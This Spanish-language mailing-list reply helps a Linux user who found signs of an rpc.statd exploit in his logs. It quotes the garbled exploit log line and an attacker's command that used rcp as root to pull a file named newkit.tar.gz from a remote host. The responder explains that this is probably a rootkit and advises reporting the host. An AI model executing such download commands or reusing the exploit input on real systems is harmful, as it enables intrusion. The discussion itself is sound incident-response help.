[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]> > Que tal amigos, checando mis log me encontre con esto > (...) > Sep 2 14:01:12 micompu rpc.statd[419]: gethostbyname error for > ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^ > Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff750 8049710 > 8054da0687465676274736f6d616e7972652065 > 20726f7220726f66 Se descubrio hace poco una vulnerabilidad enorme justo en el rpc.statd... > (...) > > y se que hicieron esto con la cuenta de root: > (...) > rcp root@128.95.73.225:newkit.tar.gz .; > > Alguie sabe que significa, en verdad hackearon mi computadora? Sin lugar a dudas. newkit.tar.gz es seguramente un rootkit - un juego re archivos formado para ocultar la presencia de un atacante en tu sistema. Puede servirte el saber que 128.95.73.225 es horus.wtc.washington.edu, una computadora que corre algun tipo de Unix, y tiene una barbaridad de puertos abiertos. Eso puede indicar que su administrador no es muy bueno, y que, siendo probablemente una computadora utilizada por los alumnos de la Universidad de Washington, el administrador te agradecera que reportes quien se esta portando mal en su sistema, y posiblemente que le eches una mano para cerrar sus agujeros. Saludos, ------------------------------------------------------------------- Gunnar Wolf gwolf en campus iztacala unam mx Universidad Nacional Autónoma de México, Campus Iztacala Jefatura de Sección de Desarrollo y Admon. de Sistemas en Red Area de Seguridad en Computo - DCI - DGSCA - UNAM ------------------------------------------------------------------- Beginner thinks 1Kb == 1000 bytes. Master knows 1Km == 1024m --------------------------------------------------------- para salir de la lista, enviar un mensaje con las palabras "unsubscribe ayuda" en el cuerpo a majordomo en linux org mx